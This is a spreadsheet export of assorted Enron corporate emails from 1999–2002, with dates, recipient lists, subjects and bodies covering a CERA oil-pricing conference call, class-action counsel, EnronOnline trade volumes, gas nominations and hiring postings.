---------------------- Forwarded by Ellen Wallumrod/NA/Enron on 12/18/2000 _x000D_
04:33 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Deirdre McCaffrey @ ECT                           12/18/2000 01:18 PM_x000D_
	_x000D_
_x000D_
To: Ellen Wallumrod/NA/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: _x000D_
_x000D_
Ellen -_x000D_
_x000D_
Let me know what you think._x000D_
_x000D_
Deirdre_x000D_
39685_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 4 Oct 2000 09:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ken.powers@enron.com', 'dave.neubauer@enron.com', 'frank.oldenhuis@enron.com', 'rockey.storie@enron.com', 'loren.penkava@enron.com', 'john.dushinske@enron.com', 'steve.gilbert@enron.com', 'vernon.mercaldo@enron.com', 'larry.swett@enron.com', 'courtney.barker@enron.com', 'craig.buehler@enron.com', 'mike.ullom@enron.com', 'michael.ratner@enron.com', 'laura.lantefield@enron.com', 'bob.stevens@enron.com', 'steve.klimesh@enron.com', 'jim.wiltfong@enron.com', 'tony.perry@enron.com', 'kent.miller@enron.com', 'mike.barry@enron.com', 'kay.threet@enron.com', 'michael.bodnar@enron.com', 'tk.lohman@enron.com', 'yuan.tian@enron.com', 'lon.stanton@enron.com', 'lisa.valley@enron.com', 'jeff.nielsen@enron.com', 'kevin.hyatt@enron.com', 'tim.johanson@enron.com', 'allen.cohrs@enron.com', 'frank.semin@enron.com', 'chuck.wilkinson@enron.com', 'penny.mccarran@enron.com', 'miriam.martinez@enron.com', 'jo.williams@enron.com', 'martha.janousek@enron.com', 'robert.mason@enron.com', 'christine.stokes@enron.com', 'neal.shaw@enron.com', 'sean.bolks@enron.com', 'stephanie.korbelik@enron.com', 'larry.pavlou@enron.com', 'dana.jones@enron.com', 'sebastian.corbacho@enron.com', 'janet.bowers@enron.com', 'bob.burleson@enron.com', 'eileen.peebles@enron.com', 'lee.ferrell@enron.com', 'david.badura@enron.com', 'john.fiscus@enron.com', 'tracy.schwartzkopf@enron.com', 'kimberly.watson@enron.com', 'john.williams@enron.com', 'stephen.herber@enron.com', 'steven.harris@enron.com', 'sue.neville@enron.com', 'david.marye@enron.com', 'morgan.gottsponer@enron.com', 'don.powell@enron.com', 'steve.weller@enron.com', 'reyna.cabrera@enron.com', 'rob.wilson@enron.com', 'sarabeth.smith@enron.com', 'lorraine.lindberg@enron.com', 'julie.mccoy@enron.com', 'bill.mangels@enron.com', 'lindy.donoho@enron.com', 'michael.stage@enron.com', 'chris.sebesta@enron.com', 'gary.sova@enron.com', 'jeffery.fawcett@enron.com', 'john.goodpasture@enron.com', 'theresa.branney@enron.com', 'michelle.lokay@enron.com', 'karen.lagerstrom@enron.com', 'bill.fowler@enron.com', 'joni.bollinger@enron.com'})</t>
  </si>
  <si>
    <t>Invitation to CERA Web-Based Conference Call on Oil Pricing</t>
  </si>
  <si>
    <t xml:space="preserve">I have registered us for attendance on this conference call.  Anyone that _x000D_
wants to attend can meet in the Conf Room 697 from 9:00-10:00 a.m. on _x000D_
Thursday, October 12.  If any Houston staff want to attend the call, I will _x000D_
probably have to register you separately.  Let me know if you would like to _x000D_
listen in at the Houston location._x000D_
_x000D_
Lorna_x000D_
_x000D_
----------------------------------------------------_x000D_
_x000D_
_x000D_
Dear CERA Members and Friends: _x000D_
_x000D_
Are oil companies leaving money on the table in their use of benchmark crude _x000D_
prices?? What can be done to lower the risk in these potentially harmful _x000D_
calculations?_x000D_
_x000D_
One of Cambridge Energy Research Associates' (CERA) core businesses has been _x000D_
benchmark crude oil price analysis. In our new multiclient study, "The Hole _x000D_
in the Barrel", CERA goes beyond our benchmark price analyses to analyze the _x000D_
structure of the market itself.? We argue the limits and real economic losses _x000D_
that can result from misunderstanding these prices - specifically the Brent _x000D_
benchmark - in oil company financial calculations and strategic planning, the _x000D_
magnitude of which can be significant, often amounting to dollars - not cents _x000D_
- per barrel._x000D_
_x000D_
As an introduction to this new study, we would like to invite you to _x000D_
participate in this complementary multimedia conference call and web _x000D_
presentation on October 12, 2000.? With the current volatility and high _x000D_
levels of energy prices, this conference call will bring clarity to these _x000D_
important and relevant issues._x000D_
_x000D_
To enroll for the call, please RSVP to 1-800-289-0579 or 719-457-2550 and _x000D_
reference the Confirmation Code 984848 in order to participate in the call._x000D_
_x000D_
In this detailed study, CERA looks at what people really mean when they talk _x000D_
about the oil price.? As part of the study, we: _x000D_
_x000D_
* Analyze each of the five contracts that make up the Brent market and _x000D_
consider their long-term future given the steady decline of "wet" barrels, _x000D_
including how other price markers might evolve._x000D_
_x000D_
* Outline how oil companies have more discretion to raise revenues (for a _x000D_
given volume of production) than is generally appreciated._x000D_
_x000D_
* Examine each of the three components that make up oil prices (absolute _x000D_
price level, time and grade differentials), to show where revenue is being _x000D_
lost and what can be done to add it back again._x000D_
_x000D_
* Assess the management control issues associated with any market activity _x000D_
and conclude that the risks of dealing are significant but not overwhelming, _x000D_
especially in comparison to the underlying and increasing price risk that _x000D_
they help to manage._x000D_
_x000D_
In this evolving New World, while trading may or may not be good for you, not _x000D_
understanding the market can be fatal. _x000D_
_x000D_
CONFERENCE CALL TOPICS: _x000D_
* Brent Blend as a price benchmark for a significant proportion of _x000D_
internationally traded crude oils. _x000D_
* The fitness for purpose of each of the five interwoven but separate _x000D_
contracts in the Brent market to different sectors of the oil industry _x000D_
_x000D_
* The risks and rewards of dealing in the Brent market _x000D_
_x000D_
Our speakers will address this topic for 20-30 minutes, with accompanying _x000D_
graphics presented on the Internet, followed by an open question and answer _x000D_
period._x000D_
_x000D_
SPEAKERS: _x000D_
Tim Fitzgerald, Senior Director _x000D_
Liz Bossley, Senior Associate _x000D_
Ann-Louise Hittle, Senior Director, World Oil _x000D_
Julian West, Senior Director, Energy &amp; e-Business _x000D_
_x000D_
TIME: _x000D_
10:00AM Eastern, Thursday, October 12, 2000 _x000D_
_x000D_
TO ENROLL: _x000D_
Please RSVP 1-800-289-0579 or 719-457-2550 and reference the Confirmation _x000D_
Code 984848 in order to participate in the call._x000D_
_x000D_
TO PARTICIPATE: _x000D_
For the audio portion of the call, please call in on one of the following _x000D_
numbers approximately 10-15 minutes before the call:_x000D_
_x000D_
Within the United States: 1-800-262-1292 _x000D_
Outside the United States: 1-719-457-2680 _x000D_
Confirmation code: 984848 _x000D_
Title of the call: Brent Study, The Hole in the Barrel, multimedia CERA _x000D_
marketing call _x000D_
_x000D_
For the Internet portion of the call (audio is by telephone), please log on _x000D_
to the Internet approximately 15-30 minutes before the presentation to ensure _x000D_
technological compatibility._x000D_
_x000D_
1. Point your browser to http://vcast.premconf.com. (Do not include WWW in _x000D_
the URL) _x000D_
2. At the VisionCast Home Page, click on "Attend a Private Conference." _x000D_
3. Follow all directions given regarding additional technology required (if _x000D_
any). _x000D_
4. You will be prompted for an Event Name (vc984848), your name, and your _x000D_
company name. _x000D_
5. Fill in all fields and click "Continue." _x000D_
_x000D_
System Requirements and Suggestions: _x000D_
? Internet connection not reliant on the phone line you will use for the _x000D_
call. _x000D_
? A Java-enabled browser, such as Microsoft Internet Explorer 3.02 or higher; _x000D_
Netscape Navigator 3.02 or higher; or Sun Hot JAVA(tm)_x000D_
_x000D_
? Close all desktop applications and disable your screen saver _x000D_
_x000D_
A recording of this call (audio only) will be available until October 26, _x000D_
2000.? To access this recording, please call 1-888-203-1112? 1-719-457-0820 _x000D_
(within the U.S.) or 1-719-457-0820 (outside the U.S.).? Please use _x000D_
confirmation number 984848 to access the call._x000D_
_x000D_
We hope you will join us in this important event, and look forward to working _x000D_
with you in the future.? For more information about this new study or CERA _x000D_
please visit our website at http://www.cera.com or contact Kathleen Doherty _x000D_
at +1 (617) 498 9194 or via e-mail to kdoherty@cera.com ._x000D_
_x000D_
Sincerely, _x000D_
_x000D_
Tim Fitzgerald, CERA Senior Director _x000D_
_x000D_
************************************************************ _x000D_
Our relationship with you is very important to us.? If you _x000D_
wish not to receive e-mail notifications from CERA, please _x000D_
send a reply to this message with "DoNotEmail" as the subject _x000D_
of your message. ( mailto:info@cera.com?subject=DoNotEmail ) _x000D_
************************************************************ _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 29 Apr 2001 23:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pfolse@susmangodfrey.com'})</t>
  </si>
  <si>
    <t>Re: California Power Class Action</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks. Frankly, at this point, it is anyone's guess how this will develop. _x000D_
Given your distance to Spokane, Is there a local counsel that you would _x000D_
recommend---one with good ties to Jugde Whaley._x000D_
_x000D_
_x000D_
_x000D_
	Parker Folse &lt;pfolse@SusmanGodfrey.com&gt;_x000D_
	04/27/2001 04:02 PM_x000D_
		 _x000D_
		 To: "Richard Sanders (E-mail)" &lt;richard.b.sanders@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: California Power Class Action_x000D_
_x000D_
_x000D_
Maybe it goes without saying, but to dispel any doubt:  if the class action_x000D_
suit that we discussed yesterday remains in front of Judge Whaley, and if he_x000D_
handles the case out of Spokane, and if you decide that it makes sense to_x000D_
retain co-counsel from Washington (a lot of if's, I know), I hope you will_x000D_
consider our firm, and more specifically our office here in Seattle.  I have_x000D_
defended numerous class action suits over the years, including, on behalf of_x000D_
Northwest Airlines, a claim of price-fixing among major air carriers in the_x000D_
setting of travel agent commissions.  As I mentioned, I also have some_x000D_
knowledge about the roots and consequences of the current power crisis on_x000D_
the West Coast, and I have some experience with Judge Whaley as well.  A_x000D_
detailed personal resume along with a list of recent cases I have handled is_x000D_
available on the firm's website (www.susmangodfrey.com)._x000D_
_x000D_
Whether it ultimately makes sense for Enron to retain us in this case or_x000D_
not, don't hesitate to call again if there is any other way I can be_x000D_
helpful._x000D_
_x000D_
Parker C. Folse III_x000D_
Susman Godfrey L.L.P._x000D_
1201 Third Avenue, Suite 3090_x000D_
Seattle, WA 98101_x000D_
(206) 516-3880_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Nov 2001 07:36:02 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'pam.butler@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'k..allen@enron.com', 'pam.butler@enron.com', 'a..martin@enron.com', 'scott.neal@enron.com', 'renee.ratcliff@enron.com'})</t>
  </si>
  <si>
    <t>Phantom Stock Payouts</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Attendees:	Pam Butler_x000D_
		Renee Ratcliff_x000D_
		Larry Lewis_x000D_
		Tom Martin_x000D_
		Scott Neal_x000D_
		Phil Allen</t>
  </si>
  <si>
    <t>Fri, 18 Aug 2000 08:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CAISO Notification - IMPORTANT Expost 10 minute price informatio n</t>
  </si>
  <si>
    <t xml:space="preserve">  The Expost 10 minute price information for 6/15/00 hours 12-24 is now_x000D_
posted in the Market Operations Exceptions Real Time area_x000D_
http://www.caiso.com/marketops/OASIS/exceptions/ as a .csv file. If you have_x000D_
any questions please contact Ginger Seitles at 916.351.4420._x000D_
_x000D_
_x000D_
_x000D_
   CRCommunications_x000D_
  Client Relations Communications</t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 07:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'david.bush@enron.com', 'lee.papayoti@enron.com', 'anita.luong@enron.com', 'kerry.roper@enron.com', 'paul.fox@enron.com', 'james.prentice@enron.com', 'maritta.mullet@enron.com', 'sally.shuler@enron.com', 'gregg.lenart@enron.com', 'robert.lee@enron.com', 'mark.diedrich@enron.com', 'daren.farmer@enron.com', 'david.johnson@enron.com', 'steven.elliott@enron.com', 'john.nowlan@enron.com', 'thomas.meers@enron.com'})</t>
  </si>
  <si>
    <t>NATURAL GAS NOMINATION FOR 10/00</t>
  </si>
  <si>
    <t>Enron Methanol nominates the following natural gas requirements for the _x000D_
Methanol Plant for October 2000:_x000D_
_x000D_
38,000 mmbtu per day_x000D_
_x000D_
EGPFC nominates the following natural gas requirements for the MTBE Plant at _x000D_
Morgan's Point for October 2000:_x000D_
_x000D_
10,000 mmbtu per day</t>
  </si>
  <si>
    <t>Thu, 22 Mar 2001 05:20:08 -0800 (PST)</t>
  </si>
  <si>
    <t>Has Ken Lay received a breifing binder yet? Can I get a copy soon?_x000D_
_x000D_
Thanks John</t>
  </si>
  <si>
    <t>Fri, 4 Jan 2002 18:36:48 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/4/02; HourAhead hour: 21;</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Start Date: 1/4/02; HourAhead hour: 21;  No ancillary schedules awarded.  Variances detected._x000D_
Variances detected in Load schedule. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002010421.txt_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 21 / Preferred: 144.52 / Final: 144.49)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: SDG1_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 1/4/02_x000D_
  SC_ID: ENRJ_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 25 Apr 2000 09:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'alexus.rhone@enron.com', 'linda.vargo@enron.com'})</t>
  </si>
  <si>
    <t>EnTelligence Postings</t>
  </si>
  <si>
    <t xml:space="preserve">VP Approval for out of budget additions are in process - verbal approval _x000D_
received today.  Please post both internally and externally. _x000D_
---------------------- Forwarded by Mary Solmonson/HOU/ECT on 04/25/2000 _x000D_
04:03 PM ---------------------------_x000D_
_x000D_
_x000D_
Avril Forster@ENRON_x000D_
04/25/2000 03:25 PM_x000D_
To: Mary Solmonson/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: EnTelligence Postings_x000D_
_x000D_
Hi Mary,_x000D_
_x000D_
Here are the 2 posting forms with your name as dept. manager approver, _x000D_
Sally's name as VP approver and myself as requester to be forwarded to Linda _x000D_
Vargo for posting.  Linda suggested posting the positions internally for 5 _x000D_
days and then posting them externally.  Although it would be great to get _x000D_
people on board from within the company, I think we should just get the _x000D_
postings out everywhere asap._x000D_
_x000D_
Also, Linda required the following questions to be answered:_x000D_
Internal or external posting?  To be posted both internally and externally_x000D_
_x000D_
Are these positions already budgeted? No, they will have to come from out of _x000D_
budget_x000D_
_x000D_
Relocations costs to be provided? Relocation costs will be provided for _x000D_
Specialist and above positions but not for Clerk, Senior Clerk positions.  _x000D_
The same also applies for agency fees, (yes to Specialist and above, and no _x000D_
to clerk/senior clerk)._x000D_
_x000D_
Here are the postings to be approved by Sally._x000D_
_x000D_
Thanks,_x000D_
Avril_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 16:52:10 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.sherriff@enron.com', 'louise.kitchen@enron.com', 'a..shankman@enron.com', 'bob.shults@enron.com', 'jay.webb@enron.com', 'andy.zipper@enron.com', 'greg.piper@enron.com', 'dave.samuels@enron.com', 'david.forster@enron.com', 'rahil.jafry@enron.com', 'michael.bridges@enron.com', 'savita.puthigai@enron.com', 'a..bibi@enron.com', 'greg.whalley@enron.com'})</t>
  </si>
  <si>
    <t>FW: Trade Count and Volumes for April 19, 2001</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 _x000D_
_x000D_
EnronOnline_x000D_
Trade Counts and Volume for April 19th, 2001 _x000D_
_x000D_
_x000D_
			EXTERNAL		INTERNAL		TOTAL			_x000D_
COUNTRY	COMMODITY	CATEGORY	COUNT	QTY	COUNT	QTY	COUNT	QTY	UNIT OF MEASURE	_x000D_
Austria	Power	Physical	        20 	         101,331 	        -   	                   -   	        20 	         101,331 	MWh	_x000D_
Belgium	Natural Gas	Physical	          6 	         455,000 	        -   	                   -   	          6 	         455,000 	MMBtu	_x000D_
Canada	Natural Gas	Financial	          9 	      3,185,000 	        -   	                   -   	          9 	      3,185,000 	MMBtu	_x000D_
Canada	Natural Gas	Physical	      256 	      7,308,125 	          4 	         589,000 	      260 	      7,897,125 	MMBtu	_x000D_
Canada	Power	Financial	          1 	             1,544 	          3 	                710 	          4 	             2,254 	MWh (Canada)	_x000D_
Finland	Power	Financial	          1 	           11,160 	        -   	                   -   	          1 	           11,160 	MWh	_x000D_
France	Power	Physical	          5 	           60,600 	        -   	                   -   	          5 	           60,600 	MWh	_x000D_
Germany	Power	Physical	        71 	      2,307,591 	        -   	                   -   	        71 	      2,307,591 	MWh	_x000D_
Netherlands	Power	Physical	          4 	           18,564 	        -   	                   -   	          4 	           18,564 	MWh	_x000D_
Norway	Power	Financial	        41 	      1,086,432 	        -   	                   -   	        41 	      1,086,432 	MWh	_x000D_
Singapore	Oil Products	Financial	          1 	             4,839 	        -   	                   -   	          1 	             4,839 	mt 	_x000D_
Switzerland	Power	Physical	        32 	           20,080 	        -   	                   -   	        32 	           20,080 	MWh	_x000D_
United Kingdom	Crude	Financial	          9 	      1,680,000 	          7 	         175,000 	        16 	      1,855,000 	Barrel	_x000D_
United Kingdom	LPG	Financial	          5 	           10,000 	        -   	                   -   	          5 	           10,000 	mt 	_x000D_
United Kingdom	Metals	Financial	      543 	           43,425 	        41 	                875 	      584 	           44,300 	LME Registered mt Lot	_x000D_
United Kingdom	Natural Gas	Physical NBP	        93 	    15,598,550 	        -   	                   -   	        93 	    15,598,550 	MMBtu	_x000D_
United Kingdom	Natural Gas	Physical NBP Option	          1 	         920,000 	        -   	                   -   	          1 	         920,000 	MMBtu	_x000D_
United Kingdom	Oil Products	Financial	          9 	           22,500 	        -   	                   -   	          9 	           22,500 	IPE mt	_x000D_
United Kingdom	Power	Physical	        10 	         658,560 	        -   	                   -   	        10 	         658,560 	MWh	_x000D_
USA	Crude	Financial	      166 	      8,285,000 	        30 	      1,400,000 	      196 	      9,685,000 	Barrel	_x000D_
USA	Crude	Physical	        15 	      1,423,000 	        -   	                   -   	        15 	      1,423,000 	Barrel per day	_x000D_
USA	LPG	Financial	        12 	         290,000 	        -   	                   -   	        12 	         290,000 	Gallon	_x000D_
USA	LPG	Physical	          4 	           55,000 	        -   	                   -   	          4 	           55,000 	Gallon	_x000D_
USA	Lumber	Physical	          1 	                  88 	        -   	                   -   	          1 	                  88 	Board Feet	_x000D_
USA	Metals	Physical	          1 	                  40 	        -   	                   -   	          1 	                  40 	COMEX Physical Copper Lots	_x000D_
USA	Natural Gas	Financial	      807 	  287,959,220 	      479 	  197,427,406 	   1,286 	  485,386,626 	MMBtu	_x000D_
USA	Natural Gas	Financial Option	        16 	    14,920,000 	          1 	      1,000,000 	        17 	    15,920,000 	MMBTU	_x000D_
USA	Natural Gas	Physical	   1,706 	    21,186,711 	        61 	         608,587 	   1,767 	    21,795,298 	MMBtu	_x000D_
USA	Oil Products	Financial	        34 	         664,048 	          1 	                358 	        35 	         664,406 	Barrel per month	_x000D_
USA	Power	Financial	        42 	         416,480 	        53 	         607,983 	        95 	      1,024,463 	MWh	_x000D_
USA	Power	Physical	      491 	      4,664,496 	      150 	      3,694,485 	      641 	      8,358,981 	MWh	_x000D_
USA	Rate and Currency	Financial	        -   	                   -   	          6 	      8,580,000 	          6 	      8,580,000 	EUR/1	_x000D_
USA	Rate and Currency	Financial	        -   	                   -   	          1 	         430,000 	          1 	         430,000 	GBP/1	_x000D_
USA	Rate and Currency	Financial	        -   	                   -   	          5 	      1,039,032 	          5 	      1,039,032 	USD/1	_x000D_
			   4,412 		      842 		   5,254 			</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	John Buchanan - Oncall_x000D_
_x000D_
Date:		10/28/2001_x000D_
Time:		7:00 AM - 7:55 AM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 01:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tana.jones@enron.com', 'kaye.ellis@enron.com', 'carol.clair@enron.com', 'brent.hendry@enron.com', 'taffy.milligan@enron.com', 'samantha.boyd@enron.com', 'stephanie.panus@enron.com', 'mary.cook@enron.com', 'susan.bailey@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Vacation Day</t>
  </si>
  <si>
    <t>I will be taking Friday, Dec. 29 as a vacation day.  Sara_x000D_
_x000D_
P.S.  I will also be on vacation Dec. 7 &amp; 8.</t>
  </si>
  <si>
    <t>Fri, 8 Oct 1999 07:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">What do you need from me?  It is not clear from your note. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Marlene Hilliard_x000D_
10/08/99 08:52 AM_x000D_
To: Gerald Nemec/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: CCGM, L.P._x000D_
_x000D_
On or about September 23, 1999 a request for service was placed by the above _x000D_
referenced counterparty.  The request was for a Intrastate Gas Transportation _x000D_
Agreement and 311 Gas Transportation Agreement.  These agreements were _x000D_
forwarded to the counterparty, CCNG, Inc..  On or about October 6, 1999,  _x000D_
Kelly Cloud, Senior Vice President of CCNG, Inc. (713) 235-1972, called and _x000D_
informed me that the counterparty should be CCGM, L.P..  Further, she _x000D_
informed me that Section 7 of the agreement, which reads  in part: Gas is _x000D_
free from liens and adverse claims of every kind, should be changed because _x000D_
the gas that the counterparty will be transporting on HPL may and/or  is _x000D_
subject to liens.  She was instructed to destroy the agreement and another _x000D_
would be forwarded to her with the necessary corrections and re-wording of _x000D_
Section 7._x000D_
_x000D_
Attached find the agreements for the necessary changes in Section 7.  Kelly _x000D_
Cloud has instructed me to call with any further questions. _x000D_
_x000D_
_x000D_
_x000D_
Thanks._x000D_
_x000D_
Marlene D. Hilliard_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Jun 2002 08:32:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>BNP Paribas Commodity Futures EIA StorageWatch for 06/07/02</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
(See attached file: E060702.pdf)_x000D_
_x000D_
_x000D_
This message and any attachments (the "message") is_x000D_
intended solely for the addressees and is confidential. _x000D_
If you receive this message in error, please delete it and _x000D_
immediately notify the sender. Any use not in accord with _x000D_
its purpose, any dissemination or disclosure, either whole _x000D_
or partial, is prohibited except formal approval. The internet_x000D_
can not guarantee the integrity of this message. _x000D_
BNP PARIBAS (and its subsidiaries) shall (will) not _x000D_
therefore be liable for the message if modified. _x000D_
_x000D_
                ---------------------------------------------_x000D_
_x000D_
Ce message et toutes les pieces jointes (ci-apres le _x000D_
"message") sont etablis a l'intention exclusive de ses _x000D_
destinataires et sont confidentiels. Si vous recevez ce _x000D_
message par erreur, merci de le detruire et d'en avertir _x000D_
immediatement l'expediteur. Toute utilisation de ce _x000D_
message non conforme a sa destination, toute diffusion _x000D_
ou toute publication, totale ou partielle, est interdite, sauf _x000D_
autorisation expresse. L'internet ne permettant pas _x000D_
d'assurer l'integrite de ce message, BNP PARIBAS (et ses_x000D_
filiales) decline(nt) toute responsabilite au titre de ce _x000D_
message, dans l'hypothese ou il aurait ete modifie.</t>
  </si>
  <si>
    <t>Mon, 27 Mar 2000 14:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>New Product Startup: Bandwidth</t>
  </si>
  <si>
    <t xml:space="preserve">Mark,_x000D_
_x000D_
Attached is a copy of the OTC GTC which the Bandwidth group wishes to use for _x000D_
Bandwidth trading on EnronOnline, launching May 1._x000D_
_x000D_
Could you please let me know which of your guys will be looking after _x000D_
reviewing/amending this for EnronOnline?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Dave_x000D_
---------------------- Forwarded by David Forster/LON/ECT on 03/27/2000 11:22 _x000D_
PM ---------------------------_x000D_
Jay Hawthorn @ ENRON COMMUNICATIONS   03/23/2000 07:25 PM_x000D_
_x000D_
To: David Forster/HOU/ECT@ECT_x000D_
cc: Jean Mrha/Enron Communications@Enron Communications, Marcello _x000D_
Romano/LON/ECT@ECT _x000D_
_x000D_
Subject: New Product Startup: Bandwidth_x000D_
_x000D_
David,_x000D_
_x000D_
Here's a first cut of the data to get us started.  Please have a look, and _x000D_
let me know what other blanks we will need to fill in as we go.  I've also _x000D_
looked at the additional considerations, and we should sit down and discuss _x000D_
some of these things with Jean sometime soon._x000D_
_x000D_
Please review the attached documents, and I'll continue to refine them along _x000D_
the way.  Let me know if you have any questions._x000D_
_x000D_
Thanks for your help,_x000D_
Jay_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Dec 2000 02:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'loftus.fitzwater@enron.com'})</t>
  </si>
  <si>
    <t>Offer Letter Revisions</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by V Charles Weldon/HOU/ECT on 12/19/2000 _x000D_
10:56 AM ---------------------------_x000D_
_x000D_
_x000D_
Kristin Gandy@ENRON_x000D_
12/18/2000 11:36 AM_x000D_
To: Niraj.parikh@bus.utexas.edu, Monique.salazar@bus.utexas.edu, _x000D_
todd.preheim@bus.utexas.edu, Jonathan.mueller@bus.utexas.edu, _x000D_
Roman.stephens@bus.utexas.edu, Nadeem.abullah@bus.utexas.edu, _x000D_
scott.conner@bus.utexas.edu, tom.dalton@bus.utexas.edu, _x000D_
jacee.burnes@bus.utexas.edu_x000D_
cc:  (bcc: V Charles Weldon/HOU/ECT)_x000D_
Subject: Offer Letter Revisions_x000D_
_x000D_
Hello UT Candidates,_x000D_
_x000D_
As most of you have already heard unfortunately Becky Bruce is no longer with _x000D_
Enron.  My name is Kristin Gandy and I will be taken over recruiting for UT.  _x000D_
I wanted to send you a quick email to let you know about some changes we are _x000D_
making._x000D_
_x000D_
Attached please find a document with information containing Enron's offer _x000D_
letter revisions.  Have a wonderful holiday season and I hope to hear from _x000D_
you soon._x000D_
_x000D_
Please contact me at 713-345-3214 if you have any questions._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Kristin Gandy_x000D_
Associate Recruiter_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 08:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Click Paper Approvals, 03-12a-01</t>
  </si>
  <si>
    <t xml:space="preserve">Can you please send me only 1 list of Clickpaper counterparties per day.  It _x000D_
gets very confusing for me sometimes to figure out what lists I should be _x000D_
responding to when I get multiple lists._x000D_
_x000D_
_x000D_
_x000D_
	Aparna Rajaram/ENRON@enronXgate_x000D_
	03/12/2001 04:09 PM_x000D_
		 _x000D_
		 To: Kelly Lombardi/NA/Enron@Enron, Samuel Schott/HOU/ECT@ECT, Bernice _x000D_
Rodriguez/HOU/ECT@ECT, Bill D Hare/HOU/ECT@ect, Steve Venturatos/HOU/ECT@ECT, _x000D_
Camille Gerard/Corp/Enron@ENRON, Mary G Gosnell/HOU/ECT@ECT, Samuel _x000D_
Schott/HOU/ECT@ECT, Tanya Rohauer/ENRON@enronXgate, Tom _x000D_
Moran/ENRON@enronXgate, Tana Jones/HOU/ECT@ECT, Frank L Davis/HOU/ECT@ECT, _x000D_
Ken Curry/ENRON@enronXgate, Nicole Hunter/NA/Enron@Enron, Bernice _x000D_
Rodriguez/HOU/ECT@ECT, Kelly Lombardi/NA/Enron@Enron, Bill D Hare/HOU/ECT@ect_x000D_
		 cc: _x000D_
		 Subject: Click Paper Approvals, 03-12a-01_x000D_
_x000D_
Please see attached._x000D_
_x000D_
_x000D_
_x000D_
Regards,_x000D_
_x000D_
Aparna Rajaram_x000D_
ext. 5-4563_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 4 May 2001 07:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'jim.meyn@enron.com', 'edward.sacks@enron.com', 'nick.hiemstra@enron.com', 'tom.may@enron.com', 'lloyd.will@enron.com', 'w.duran@enron.com', 'mark.davis@enron.com', 'berney.aucoin@enron.com', 'jeffrey.miller@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>Very rough proposal letter for NiMO</t>
  </si>
  <si>
    <t xml:space="preserve">Attached please find a very rough first cut of a proposal letter outlining a _x000D_
proposal format that we are likely to submit to NiMO on Tuesday 5/8 (due 10 _x000D_
AM eastern).   Please have a read through and provide me any comments or _x000D_
feedback.   We will be finalizing our indicative numbers for the proposal on _x000D_
Monday, so any feedback would be appreciated no later than noon on Monday _x000D_
(earlier if possible).    thanks _x000D_
_x000D_
John_x000D_
_x000D_
P.S. please forward to anyone i migth have missed_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 10 Apr 2000 07:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>AEWS Term Sheet</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Mike J Miller/HOU/ECT on 04/10/2000 02:22 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Stuart Zisman_x000D_
04/10/2000 01:11 PM_x000D_
To: Mike J Miller/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
At Healy's request attached is the latest AES LOI_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 06:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>JP Morgan Futures</t>
